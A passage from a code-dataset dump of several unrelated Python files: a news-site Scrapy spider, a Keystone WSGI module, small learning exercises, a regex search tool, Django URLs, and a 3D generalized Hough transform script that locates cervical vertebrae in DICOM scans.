word))\n\t\telif None != convert_number(word):\n\t\t\tresults.append(('number', int(word)))\n\t\telse:\n\t\t\tresults.append(('error', word))\n\treturn results","sub_path":"learn python the hard way/ex48/ex48/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"406366305","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport urlparse\n\nimport dateutil.parser\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\nfrom corpus_builder.items import TextEntry\n\n\nclass JanakanthaSpider(CrawlSpider):\n name = \"janakantha\"\n allowed_domains = [\"dailyjanakantha.com\"]\n\n rules = (\n Rule(\n LinkExtractor(\n # https://www.dailyjanakantha.com/details/article/194671/%E0%A6%AA%E0%A6%A5%E0%A7%87-%E0%A6%AA%E0%A6%A5%E0%A7%87-%E0%A6%9A%E0%A6%BE%E0%A6%81%E0%A6%A6%E0%A6%BE%E0%A6%AC%E0%A6%BE%E0%A6%9C%E0%A6%BF\n allow=('/details/article/\\d+/[^\\/]+$'),\n restrict_xpaths=('//div[@class=\"content\"]')\n ),\n callback='parse_news'),\n )\n\n def __init__(self, start_date=None, end_date=None, category=None, *a, **kw):\n self.start_date = dateutil.parser.parse(start_date)\n\n if end_date:\n self.end_date = dateutil.parser.parse(end_date)\n else:\n self.end_date = self.start_date\n\n self.category = category or None\n\n super(JanakanthaSpider, self).__init__(*a, **kw)\n\n def start_requests(self):\n yield scrapy.Request('https://www.dailyjanakantha.com/',\n callback=self.start_categorized_requests)\n\n def start_categorized_requests(self, response):\n menu_links = [urlparse.urlparse(x.strip()).path.split('/')[-1] \\\n for x in response.css('nav.menu a::attr(\"href\")').extract()]\n categories = [x for x in menu_links if (not x == \"\" and not x == \"#\")]\n\n if self.category is not None:\n if self.category in categories:\n categories = [self.category]\n else:\n raise ValueError('invalid category slug. available slugs: %s' % \", \".join(categories))\n\n date_processing = self.start_date\n while date_processing <= self.end_date:\n for category in categories:\n # https://www.dailyjanakantha.com/frontpage/date/2016-06-01\n url = 'https://www.dailyjanakantha.com/{0}/date/{1}'.format(\n category,\n date_processing.strftime('%Y-%m-%d')\n )\n yield self.make_requests_from_url(url)\n date_processing += datetime.timedelta(days=1)\n\n def parse_news(self, response):\n item = TextEntry()\n item['body'] = \"\".join(part for part in response.css('p.artDetails *::text').extract())\n return item\n","sub_path":"corpus_builder/spiders/janakantha.py","file_name":"janakantha.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"220839620","text":"# Copyright 2013 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\n\nfrom oslo_config import cfg\nimport oslo_i18n\nfrom oslo_log import log\n\nfrom keystone.common import profiler\n\n\n# NOTE(dstanek): i18n.enable_lazy() must be called before\n# keystone.i18n._() is called to ensure it has the desired lazy lookup\n# behavior. This includes cases, like keystone.exceptions, where\n# keystone.i18n._() is called at import time.\noslo_i18n.enable_lazy()\n\n\nfrom keystone.common import config\nfrom keystone.server import common\nfrom keystone.version import service as keystone_service\n\n\nCONF = cfg.CONF\n\n\ndef initialize_application(name,\n post_log_configured_function=lambda: None,\n config_files=None):\n if not config_files:\n config_files = None\n\n common.configure(config_files=config_files)\n\n # Log the options used when starting if we're in debug mode...\n if CONF.debug:\n CONF.log_opt_values(log.getLogger(CONF.prog), log.DEBUG)\n\n post_log_configured_function()\n\n def loadapp():\n return keystone_service.loadapp(\n 'config:%s' % config.find_paste_config(), name)\n\n _unused, application = common.setup_backends(\n startup_application_fn=loadapp)\n\n # setup OSprofiler notifier and enable the profiling if that is configured\n # in Keystone configuration file.\n profiler.setup(name)\n\n return application\n\n\ndef _get_config_files(env=None):\n if env is None:\n env = os.environ\n\n dirname = env.get('OS_KEYSTONE_CONFIG_DIR', '').strip()\n\n files = [s.strip() for s in\n env.get('OS_KEYSTONE_CONFIG_FILES', '').split(';') if s.strip()]\n\n if dirname:\n if not files:\n files = ['keystone.conf']\n files = [os.path.join(dirname, fname) for fname in files]\n\n return files\n\n\ndef initialize_admin_application():\n return initialize_application(name='admin',\n config_files=_get_config_files())\n\n\ndef initialize_public_application():\n return initialize_application(name='main',\n config_files=_get_config_files())\n","sub_path":"keystone/keystone/server/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"635862780","text":"'''\nWrite the necessary code calculate the volume and surface area\nof a cylinder with a radius of 3.14 and a height of 5. 
Print out the result.\n\n\n'''\n\nimport math\n\n# V = pi * r^2 * h for a cylinder with r = 3.14 and h = 5\nvolume = math.pi * 3.14 ** 2 * 5\n# A = 2*pi*r^2 + 2*pi*r*h (two caps plus the lateral surface)\nsurface = 2 * math.pi * 3.14 ** 2 + 2 * math.pi * 3.14 * 5\n\nprint(volume)\nprint(surface)","sub_path":"labs/02_basic_datatypes/02_01_cylinder.py","file_name":"02_01_cylinder.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"4640453","text":"from regex_handler import RegexHandlerFromFile, RegexHandlerFromInput\nimport argparse\nfrom sys import stdin\n\nglobal path\nglobal regex\nglobal input_t\n\n\ndef startup_handler():\n global path\n global regex\n global input_t\n\n parser = argparse.ArgumentParser(description='Grep like program to search files or text for keywords using regexes')\n exclusive = parser.add_mutually_exclusive_group()\n exclusive.add_argument('-p', '--path', help='Path to file to be searched.')\n exclusive.add_argument('-i', '--input', help='Choose to enter input manually instead of a file', action='store_true')\n parser.add_argument('-r', '--regex', help='Define the regular expression.')\n args = parser.parse_args()\n\n regex = args.regex\n path = args.path\n input_t = args.input\n\n\ndef main():\n startup_handler()\n\n if not input_t:\n handler = RegexHandlerFromFile(path, regex)\n handler.print_finds()\n else:\n text = ''\n for line in stdin:\n text += line\n handler = RegexHandlerFromInput(text, regex)\n handler.print_finds()\n\nif __name__ == '__main__':\n main()\n","sub_path":"Interpreted/Python/Priv/idea_bag/regex_query_tool/greppy.py","file_name":"greppy.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200984661","text":"# Our program has many threads, we want to implement communication between these threads.\n\n# Using queue module Queue. Firstly, we create a Queue instance, which will be shared by all the threads. 
Then threads can use put() and get() to add or remove elements.\n\nfrom queue import Queue\nfrom threading import Thread\nimport time\n\n_sentinel = object()\n\n# A thread that produces data\ndef producer(out_q):\n\tn = 10\n\twhile n > 0:\n\t\t# Produce some data\n\t\tout_q.put(n)\n\t\ttime.sleep(2)\n\t\tn -= 1\n\n\t# Put the sentinel on the queue to indicate completion\n\tout_q.put(_sentinel)\n\n# A thread that consumes data\ndef consumer(in_q):\n\twhile True:\n\t\t# Get some data\n\t\tdata = in_q.get()\n\n\t\t# Check for termination\n\t\tif data is _sentinel:\n\t\t\tin_q.put(_sentinel)\n\t\t\tbreak\n\n\t\t# Process the data\n\t\tprint ('Got:', data)\n\tprint ('Consumer shutting down')\n\nif __name__ == '__main__':\n\tq = Queue()\n\tt1 = Thread(target=consumer, args=(q,))\n\tt2 = Thread(target=producer, args=(q,))\n\tt1.start()\n\tt2.start()\n\tt1.join()\n\tt2.join()\n","sub_path":"12_cocurrency/3_connections_between_threads/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"605746113","text":"from django.urls import path\nfrom palette.views import PaletteDetailView, PaletteFormView, PaletteDeleteView\n\napp_name = 'palette'\n\nurlpatterns = [\n path('', view=PaletteFormView.as_view(), name='new'),\n path('<pk>/', view=PaletteDetailView.as_view(), name='detail'),\n path('<pk>/delete/', view=PaletteDeleteView.as_view(), name='delete'),\n]","sub_path":"palette/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"149228916","text":"import os\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom scipy.misc import imread\nfrom skimage.feature import canny\nfrom scipy.ndimage.filters import sobel\nfrom mpl_toolkits.mplot3d import Axes3D\nimport cv2 as cv\nfrom scipy import signal\nfrom scipy.ndimage.filters import gaussian_filter\nimport datetime\nimport openpyxl\nimport random\nimport cython\nfrom multiprocessing import Pool\n\ntry:\n import cPickle\nexcept ImportError:\n import pickle as cPickle\n\n\ndef gradient_orientation(image):\n '''\n Calculate the gradient orientation for edge point in the image\n '''\n #scipy.ndimage.sobel\n dx = sobel(image, axis=0, mode='constant')\t\n dy = sobel(image, axis=1, mode='constant')\n dz = sobel(image, axis=2, mode='constant')\n \n #For 3D instead of a single gradient value, we need two angles that define a normal vector\n #Phi is the angle between the positive x-axis to the projection of the normal vector onto the x-y plane (around +z)\n #Psi is the angle between the positive z-axis to the normal vector\n \n phi = np.arctan2(dy ,dx) * 180 / np.pi\n psi = np.arctan2(np.sqrt(dx*dx + dy*dy), dz) * 180 / np.pi\n \n\n gradient = np.zeros(image.shape)\n \n return phi, psi\n\ndef build_r_table(image, origin):\n '''\n Build the R-table from the given shape image and a reference point\n '''\n edges = canny_edges_3d(image)\n \n #Takes (47,40) Edges and calculates the gradients using sobel\n phi, psi = gradient_orientation(edges)\n #print(\"Phi Dim: \", phi.shape)\n \n r_table = defaultdict(list)\n for (i,j,k),value in np.ndenumerate(edges):\n if value:\n r_table[(int(phi[i,j,k]),int(psi[i,j,k]))].append((origin[0]-i, origin[1]-j, origin[2] - k))\n \n \n return r_table\n\ndef canny_edges_3d(grayImage):\n dim = np.shape(grayImage)\n \n edges_x = np.zeros(grayImage.shape, dtype=bool) \n 
edges_y = np.zeros(grayImage.shape, dtype=bool) \n edges_z = np.zeros(grayImage.shape, dtype=bool) \n edges = np.zeros(grayImage.shape, dtype=bool) \n \n\n for i in range(dim[0]):\n edges_x[i,:,:] = canny(grayImage[i,:,:], low_threshold=MIN_CANNY_THRESHOLD, high_threshold=MAX_CANNY_THRESHOLD, sigma = std_dev_canny)\n \n for j in range(dim[1]):\n edges_y[:,j,:] = canny(grayImage[:,j,:], low_threshold=MIN_CANNY_THRESHOLD, high_threshold=MAX_CANNY_THRESHOLD, sigma = std_dev_canny)\n \n for k in range(dim[2]):\n edges_z[:,:,k] = canny(grayImage[:,:,k], low_threshold=MIN_CANNY_THRESHOLD, high_threshold=MAX_CANNY_THRESHOLD, sigma = std_dev_canny)\n \n \n for i in range(dim[0]):\n for j in range(dim[1]):\n for k in range(dim[2]):\n #edges[i,j,k] = (edges_x[i,j,k] and edges_y[i,j,k]) or (edges_x[i,j,k] and edges_z[i,j,k]) or (edges_y[i,j,k] and edges_z[i,j,k])\n edges[i,j,k] = (edges_x[i,j,k]) or (edges_y[i,j,k]) or (edges_z[i,j,k])\n \n \n return edges\n\n#grayImage is queryImage\ndef accumulate_gradients(r_table, grayImage):\n '''\n Perform a General Hough Transform with the given image and R-table\n '''\n \n #Get edges matrix from Canny \n edges = canny_edges_3d(grayImage) \n \n #Get gradient angles\n phi, psi = gradient_orientation(edges)\n \n accumulator = np.zeros(grayImage.shape)\n #int accum_i\n accum_i = 0\n accum_j = 0 \n accum_k = 0\n\n edges_dim = np.shape(edges)\n\n print(datetime.datetime.now())\n \n \n for (i,j,k),value in np.ndenumerate(edges):\n if value: \n for r in r_table[(int(phi[i,j,k]), int(psi[i,j,k]))]:\n #iterations = iterations + 1\n accum_i, accum_j, accum_k = i+r[0], j+r[1], k+r[2]\n if accum_i < accumulator.shape[0] and accum_j < accumulator.shape[1] and accum_k < accumulator.shape[2]:\n accumulator[int(accum_i), int(accum_j), int(accum_k)] += 1 \n \n \n print(datetime.datetime.now()) \n \n #Approximately 400-550k iterations\n #print(\"Number of Iterations in Accumulate Gradients: \", iterations)\n\n return accumulator\n\ndef general_hough_closure(reference_image):\n '''\n Generator function to create a closure with the reference image and origin\n at the center of the reference image\n \n Returns a function f, which takes a query image and returns the accumulator\n '''\n \n referencePoint = (reference_image.shape[0]/2, reference_image.shape[1]/2, reference_image.shape[2]/2)\n \n #print(\"Reference Point: \", referencePoint)\n \n r_table = build_r_table(reference_image, referencePoint)\n \n def f(query_image):\n return accumulate_gradients(r_table, query_image)\n \n return f\n\ndef n_max(a, n):\n '''\n Return the N max elements and indices in a\n '''\n indices = (-a.ravel()).argsort()[:n]\n indices = (np.unravel_index(i, a.shape) for i in indices)\n return [(a[i], i) for i in indices]\n \ndef test_general_hough(gh, reference_image, query):\n '''\n Uses a GH closure to detect shapes in an image and create nice output\n '''\n #query_image = imread(query, flatten=True)\n query_image = query\n query_dim = np.shape(query)\n reference_dim = np.shape(reference_image)\n\n accumulator = gh(query_image)\n\n return accumulator\n\n\n#===================================================================================================\n#****************************************** START OF GHT *******************************************\n#===================================================================================================\ndef GHT(ac_num):\n#===================================================================================================\n#Obtaining the list of 
references to use and bounding the Region of Interest\n#===================================================================================================\n #Get the references that will be used for Cervical Spine Vertebrae Detection\n reference_acs = []\n\n image_file_name = ac_num + \"_accumulator_sigma_\" + str(std_dev) + \"_edge_sigma_\" + str(std_dev_edges) + \"_canny_sigma_\" + str(std_dev_canny) + \"_min_canny_\" + str(MIN_CANNY_THRESHOLD) + \"_max_canny_\" + str(MAX_CANNY_THRESHOLD)\n\n for file_name in os.listdir(\"no_fractures\"):\n #The name should have \"reference\" in it but no \"edge\" in it\n if file_name.find(\"reference.pkl\") != -1 and file_name.find(\"edge\") == -1:\n #The reference list should not include the reference from the current ac_num\n if file_name.find(str(ac_num)) == -1:\n reference_acs.append(file_name)\n \n print(\"Accession Number: \", ac_num)\n \n \n #Open Downsized Pickle File Containing DICOM Scan\n try:\n dicom_dwn4x_pp = cPickle.load(open(\"no_fractures/dicom_3d_\" + ac_num + \"_dwn4x.pkl\",\"rb\"),encoding = 'latin1')\n except:\n dicom_dwn4x_pp = cPickle.load(open(\"no_fractures/dicom_3d_\" + ac_num + \"_dwn4x.pkl\",\"rb\"))\n dicom_dwn4x_pp_dim = np.shape(dicom_dwn4x_pp)\n print(\"Size of Downsized Dicom Input: \", dicom_dwn4x_pp_dim)\n\n#**************************************************************************************************************************\n #Specify Region of Interest (Hard Blocking of Region Based on Prior Information)\n x1 = 0\n x2 = 58\n y1 = 17\n y2 = 85\n#**************************************************************************************************************************\n\n \n #Get specific region of focus (based on prior information)\n dicom_dwn4x = dicom_dwn4x_pp[x1:x2,y1:y2,:] #dicom_dwn4x contains the specific region of focus\n dicom_dwn4x_dim = np.shape(dicom_dwn4x)\n print(\"Size of Relevant Dicom (Prior Info): \", dicom_dwn4x_dim)\n \n\n#===================================================================================================\n#Obtain Final Accumulator Matrix through Max-Pooling of Individual Accumulator Matrices\n#===================================================================================================\n #Initialize Accumulator that will be used to get top points\n accumulator = np.zeros(dicom_dwn4x_dim)\n \n \n #Choose N number of references\n #random_reference_acs = []\n random_reference_acs = reference_acs[0:5]\n\n \n #while len(random_reference_acs) < 5: \n # index = random.randint(0,len(reference_acs)-1)\n \n # if reference_acs[index] not in random_reference_acs:\n # random_reference_acs.append(reference_acs[index])\n \n for reference_ac in random_reference_acs:\n print(\"Current Reference: \", reference_ac)\n \n #Open up the Reference that is used as the reference image\n try:\n reference = cPickle.load(open(\"no_fractures/\" + reference_ac,\"rb\"),encoding = 'latin1')\n except:\n reference = cPickle.load(open(\"no_fractures/\" + reference_ac,\"rb\"))\n #print(\"Size of Reference Image: \", np.shape(reference))\n\n detect_s = general_hough_closure(reference)\n \n #Use max pooling on accumulator matrix\n temp_accumulator = test_general_hough(detect_s, reference, dicom_dwn4x)\n \n accumulator = np.maximum(accumulator,temp_accumulator)\n \n final_accumulator = accumulator\n \n \n #The final accumulator is the likelihood of the detection point being somewhere.\n #The prior is the function function: prior = (1 - (x-29)^4/29^4 - (y-51)^4/34^4)^1/4\n final_ac_dim = 
np.shape(final_accumulator)\n    prior = np.zeros((final_ac_dim[0],final_ac_dim[1]))\n    \n    #print(final_ac_dim)\n    \n    #Using Prior Distribution (about average centre of Ground Truth Points)\n    pwr = 4\n    \n    for dim1 in range(final_ac_dim[0]):\n        for dim2 in range(final_ac_dim[1]):\n            if (float(dim1-29)/29)**pwr + (float(dim2 - 34)/34)**pwr <= 1:\n                prior[dim1][dim2] = math.pow(1 - (float(dim1 - 29)/29)**pwr - (float(dim2 - 34)/34)**pwr,math.pow(pwr,-1))\n                #print(math.pow(1 - (float(dim1 - 29)/29)**pwr - (float(dim2 - 34)/34)**pwr,math.pow(pwr,-1)))\n                #print(prior[dim1][dim2])\n    \n\n    #print(np.shape(prior))\n\n    for dim3 in range(final_ac_dim[2]):\n        final_accumulator[:,:,dim3] = np.multiply(final_accumulator[:,:,dim3],prior)\n    \n    \n    \n#===================================================================================================\n#Blurring the Accumulator Matrix and Query Edge Image\n#===================================================================================================\n    #Blur the final accumulator matrix\n    final_accumulator = gaussian_filter(final_accumulator,sigma = std_dev, order = 0)\n\n    #Blur the edge image for the whole dwn4x\n    query_edges = canny_edges_3d(dicom_dwn4x_pp)\n\n    query_edges_dim = np.shape(query_edges)\n    \n    query_edges_blurred = gaussian_filter(np.multiply(query_edges,50),sigma = std_dev_edges, order = 0)\n\n\n#===================================================================================================\n#Initial Plots and Top 40 Points for Visualization Purposes\n#===================================================================================================\n    plot_z = ground_truth[ac_num][2]\n\n    #Plot up to top 40 points\n    fig = plt.figure(num = image_file_name, figsize = (24,12))\n    plt.gray()\n\n    fig.suptitle(image_file_name)\n\n    fig.add_subplot(2,4,1)\n    plt.title('Query Image [Slice: ' + str(plot_z) + ']')\n    #plt.imshow(dicom_dwn4x_pp[:,:,dicom_dwn4x_pp_dim[2]//2])\n    plt.imshow(dicom_dwn4x_pp[:,:,plot_z])\n    \n    fig.add_subplot(2,4,2)\n    plt.title('Query Image Edges')\n    #plt.imshow(query_edges[:,:,dicom_dwn4x_pp_dim[2]//2])\n    plt.imshow(query_edges[:,:,plot_z])\n    \n    fig.add_subplot(2,4,3)\n    plt.title('Query Image Edges Blurred')\n    #plt.imshow(query_edges_blurred[:,:,dicom_dwn4x_pp_dim[2]//2])\n    plt.imshow(query_edges_blurred[:,:,plot_z])\n    \n    fig.add_subplot(2,4,4)\n    plt.title('Final Accumulator')\n    #plt.imshow(final_accumulator[:,:,dicom_dwn4x_dim[2]//2])\n    plt.imshow(final_accumulator[:,:,plot_z])\n    \n    fig.add_subplot(2,4,5)\n    plt.title('Detection of Top 40 Points')\n    #plt.imshow(dicom_dwn4x_pp[:,:,dicom_dwn4x_dim[2]//2])\n    plt.imshow(dicom_dwn4x_pp[:,:,plot_z])\n\n\n    #Get top 40 results that can be filtered out\n    m = n_max(final_accumulator, 40)\n\n    points = []\n    x_pts = [] \n    y_pts = []\n    z_pts = []\n    \n    for pt in m:\n        points.append((pt[1][0] + x1,pt[1][1] + y1,pt[1][2], int(pt[0])))\n        \n        x_pts.append(pt[1][0]+x1)\n        y_pts.append(pt[1][1]+y1) \n        z_pts.append(pt[1][2])\n    \n    plt.scatter(y_pts,x_pts, marker='.', color='r')\n    \n    \n    #Take the top K average \n    k = 5\n    k_sum_pp = np.zeros(3)\n    for index in range(k):\n        k_sum_pp = np.add(k_sum_pp, m[index][1])\n        #print(m[index])\n    \n    optimal_pt = (int(k_sum_pp[0]//k) + x1,int(k_sum_pp[1]//k) + y1,int(k_sum_pp[2]//k))\n    \n    #print (\"Top 40 Most Likely Points (x,y,z,certainty): \", points)\n\n\n#===================================================================================================\n#Non-maximal 
suppression\n#===================================================================================================\n #Plot NMS points\n fig.add_subplot(2,4,6)\n plt.title('Non-Maximal Suppression and Optimal Points')\n #plt.imshow(dicom_dwn4x_pp[:,:,dicom_dwn4x_pp_dim[2]//2])\n plt.imshow(dicom_dwn4x_pp[:,:,plot_z])\n\n #Perform non-maximal suppression\n nms_pts = []\n \n for pt in points:\n if len(nms_pts) == 0:\n nms_pts.append(pt)\n else:\n counter = 0\n for i in range(len(nms_pts)):\n if math.sqrt((nms_pts[i][0]-pt[0])**2 + (nms_pts[i][1]-pt[1])**2 + (nms_pts[i][2]-pt[2])**2) > 10:\n counter = counter + 1\n else:\n if pt[3] > nms_pts[i][3]:\n nms_pts[i] = pt\n \n if counter == len(nms_pts):\n nms_pts.append(pt)\n \n print(\"Non-Maximal Suppression Points: \", nms_pts)\n \n\n#===================================================================================================\n#Normalized Cross Correlation and Heat Map Generation\n#===================================================================================================\n #Sliding reference across volume around detected points to find accurate point\n #optimal_pt = [0,0]\n max_cross_correl_val = -float('inf')\n \n heat_maps = []\n \n '''\n #Generate the edge references if they do not exist in the directory \"no_Fractures\"\n for reference_ac in random_reference_acs:\n edge_reference_name = \"no_fractures/edge_references/edge\" + \"_es\" + str(std_dev_edges) + \"_min\" + str(MIN_CANNY_THRESHOLD) + \"_max\" + str(MAX_CANNY_THRESHOLD) + \"_cs\" + str(std_dev_canny) + \"_\" + reference_ac\n \n \n \n if not os.path.isfile(edge_reference_name):\n try:\n reference_vol_pp1 = cPickle.load(open(\"no_fractures/\" + reference_ac,\"rb\"),encoding = 'latin1')\n except:\n reference_vol_pp1 = cPickle.load(open(\"no_fractures/\" + reference_ac,\"rb\"))\n \n reference_vol_pp2 = np.array(reference_vol_pp1)\n \n reference_vol_edges = canny_edges_3d(reference_vol_pp2)\n reference_vol_edges_blurred = gaussian_filter(np.multiply(reference_vol_edges,50),sigma = std_dev_edges, order = 0)\n \n cPickle.dump(reference_vol_edges_blurred, open(edge_reference_name,\"wb\"),protocol = 2)\n #print(\"no_fractures/edge_\" + reference_ac)\n \n '''\n \n '''\n #Method of removing the lowest detection point if there is more than one before doing normalized cross correlation\n if len(nms_pts) > 1:\n low_pt = nms_pts[0]\n \n for pt in nms_pts:\n if pt[0] > low_pt[0]:\n low_pt = pt\n \n nms_pts.remove(low_pt)\n '''\n \n '''\n optimal_pt = [0,0,0]\n min_xdir = float('Inf')\n \n\n for pt in nms_pts:\n if pt[0] < min_xdir:\n min_xdir = pt[0]\n optimal_pt = pt[0:3]\n ''' \n \n '''\n for pt in nms_pts:\n heat_map = np.zeros((9,9,3))\n print(\"The point being investigated is: \", pt)\n\n \n\n for i in range(-dicom_dwn4x_pp_dim[0]//32,dicom_dwn4x_pp_dim[0]//32 + 1):\n for j in range(-dicom_dwn4x_pp_dim[1]//32,dicom_dwn4x_pp_dim[1]//32 + 1):\n for k in range(-1,2):\n cross_correl_val = 0\n \n for reference_ac in random_reference_acs:\n try:\n reference_vol_pp = cPickle.load(open(edge_reference_name,\"rb\"),encoding = 'latin1')\n except:\n reference_vol_pp = cPickle.load(open(edge_reference_name,\"rb\"))\n #reference_dim is the dimension of the edge reference\n reference_dim = np.shape(reference_vol_pp)\n reference_vol = np.ndarray.flatten(reference_vol_pp)\n \n #Get bounds to compare on the query image\n x1 = pt[0] - reference_dim[0]//2 + i\n x2 = x1 + reference_dim[0]\n \n y1 = pt[1] - reference_dim[1]//2 + j\n y2 = y1 + reference_dim[1]\n \n z1 = pt[2] - reference_dim[2]//2 + 
k\n z2 = z1 + reference_dim[2]\n \n #Use the Canny edge version of the query image for cross correlation\n query_vol_pp = np.array(query_edges_blurred[x1:x2,y1:y2,z1:z2])\n query_vol = np.ndarray.flatten(query_vol_pp)\n \n query_dim = np.shape(query_vol_pp)\n \n #Exit current slide location if out of bounds\n if x1 < 0 or y1 < 0 or z1 < 0:\n break\n \n if x2 > query_edges_dim[0] or y2 > query_edges_dim[1] or z2 > query_edges_dim[2]:\n break\n\n #Use norms to normalize the vectors for cross-correlation\n #print(np.linalg.norm(reference_vol))\n #print(np.linalg.norm(query_vol))\n reference_vol_norm = reference_vol/np.linalg.norm(reference_vol)\n query_vol_norm = query_vol/np.linalg.norm(query_vol)\n \n \n if (np.dot(reference_vol_norm, query_vol_norm)) < 0:\n print(\"ALERT NEGATIVE DOT PRODUCT VIOLATION\")\n \n cross_correl_val = cross_correl_val + np.dot(reference_vol_norm, query_vol_norm)\n \n heat_map[i+4,j+4,k+1] = cross_correl_val\n if cross_correl_val > max_cross_correl_val:\n #print(max_cross_correl_val)\n max_cross_correl_val = cross_correl_val\n #print(\"The cross correlation value is: \", cross_correl_val)\n optimal_pt = [pt[0]+i,pt[1]+j, pt[2]+k]\n #print(\"The optimal point currently is: \", optimal_pt)\n \n \n #Append heat_map\n heat_maps.append(heat_map)\n \n #Set Detection Threshold for Specific Accession Number\n global detection_threshold\n detection_threshold = (dicom_dwn4x_pp_dim[0]//64)*(dicom_dwn4x_pp_dim[1]//64)*3\n #print(detection_threshold)\n '''\n\n print(\"The Final Detection point is: \",optimal_pt)\n\n \n #Plot non-maximal suppression points\n nms_x_pts = [] \n nms_y_pts = []\n nms_z_pts = []\n \n for pt in nms_pts:\n nms_x_pts.append(pt[0])\n nms_y_pts.append(pt[1]) \n nms_z_pts.append(pt[2]) \n\n\n plt.scatter(nms_y_pts,nms_x_pts, marker='o', color='g')\n \n plt.scatter(optimal_pt[1],optimal_pt[0], marker='X', color='m')\n \n #Put on ground truth point on NMS + Optimal Point Plot\n plt.scatter(ground_truth[ac_num][1], ground_truth[ac_num][0], marker= 'o', color = 'c')\n \n '''\n #Add plot for heat map\n for i in range(2):\n try:\n heat_map = heat_maps[i]\n heat_map_norm = heat_map\n fig.add_subplot(2,4,7+i)\n plt.title('Heat Map')\n plt.imshow(heat_map_norm[:,:,1])\n except:\n pass\n '''\n #plt.show()\n \n \n \n #Save Figure\n #print(os.getcwd())\n print(image_dir_name)\n #print(image_file_name)\n #plt.savefig(os.path.join(image_dir_name, image_file_name + \".png\"))\n #print(os.path.join(image_dir_name, image_file_name + \".png\"))\n plt.savefig(image_dir_name + \"/\" + image_file_name + \".png\")\n \n return optimal_pt\n\n#===================================================================================================\n#******************************************* END OF GHT ********************************************\n#===================================================================================================\n\n\n#===================================================================================================\n#===================================================================================================\nif __name__ == '__main__':\n #os.chdir(\"C:\\\\Users\\\\yoons\\\\Documents\\\\ESC499\\\\Undergraduate_Thesis_Scripts\\\\DicomSubsampling\")\n os.chdir(\"../DicomSubsampling\") \n\n plt.close()\n#===================================================================================================\n#Process the accession numbers that are present and put it into a 
list\n#===================================================================================================\n ac_nums_pp = os.listdir(\"no_fractures/\")\n ac_nums = []\n \n for ac_num_pp in ac_nums_pp:\n if \"reference\" not in ac_num_pp:\n str1 = ac_num_pp.split(\"dicom_3d_\")[1]\n str2 = str1.split(\"_\")[0]\n \n ac_nums.append(str2)\n\n#===================================================================================================\n#Read in ground truth values from the ground_truth_detection_pts.xlsx spreadsheet\n#===================================================================================================\n #Get the detection results for the validation set\n book = openpyxl.load_workbook(\"../GHT/ground_truth_detection_pts_all.xlsx\")\n sheet = book.active\n row_count = sheet.max_row\n \n global ground_truth\n ground_truth = {}\n\n for i in range(3,row_count):\n \n ac_num_loc = sheet.cell(row = i,column = 1)\n ac_num = str(ac_num_loc.value)\n \n x = sheet.cell(row = i, column = 2).value\n y = sheet.cell(row = i, column = 3).value\n z = sheet.cell(row = i, column = 4).value\n \n if (x != None) and (y != None) and (z != None):\n ground_truth[ac_num] = [x,y,z]\n \n#===================================================================================================\n#Compute Detection Points, compare with ground truth to get error and detection rate\n#===================================================================================================\n global std_dev\n global std_dev_edges\n global MIN_CANNY_THRESHOLD\n global MAX_CANNY_THRESHOLD\n global std_dev_canny\n global image_file_name\n global image_dir_name\n \n #Set Hyperparameters to be validated with validation set\n std_devs = [1.0]\n std_devs_edges = [0]\n min_cannys = [30,40,50,60]\n max_cannys = [140,160,180,200]\n\n\n std_dev_canny = 0.5\n \n for std_dev in std_devs:\n for std_dev_edges in std_devs_edges:\n for MIN_CANNY_THRESHOLD in min_cannys:\n for MAX_CANNY_THRESHOLD in max_cannys:\n error = 0\n correct_detections = 0\n incorrect_ac_num = []\n detection_pt_info = {}\n \n image_dir_name = \"accumulator_sigma_\" + str(std_dev) + \"_edge_sigma_\" + str(std_dev_edges) + \"_min_canny_\" + str(MIN_CANNY_THRESHOLD) + \"_max_canny_\" + str(MAX_CANNY_THRESHOLD)\n \n print(\"Currently on: \" + image_dir_name)\n \n if os.path.isdir(image_dir_name) != 1:\n os.mkdir(image_dir_name)\n else:\n continue\n \n\n #Get the ac_num to put into multi processing\n multi_proc_ac_num = []\n \n for ac_num in ac_nums:\n if ac_num in ground_truth.keys():\n multi_proc_ac_num.append(ac_num)\n \n print(multi_proc_ac_num)\n \n #Get optimal points through multi processing\n p = Pool(processes = 25)\n \n optimal_pts = p.map(GHT,multi_proc_ac_num)\n \n optimal_pts_dict = {}\n #Put into dictionary\n for i in range(len(multi_proc_ac_num)):\n optimal_pts_dict[multi_proc_ac_num[i]] = optimal_pts[i]\n \n print(optimal_pts_dict)\n\n #Go through GHT for the validation set\n for ac_num in ac_nums:\n if ac_num in ground_truth.keys():\n \n optimal_pt = optimal_pts_dict[ac_num]\n print(\"Detected Optimal Point: \", optimal_pt)\n print(\"Ground Truth Point: \", ground_truth[ac_num])\n \n curr_error = abs(np.linalg.norm(np.subtract(optimal_pt,ground_truth[ac_num])))**2 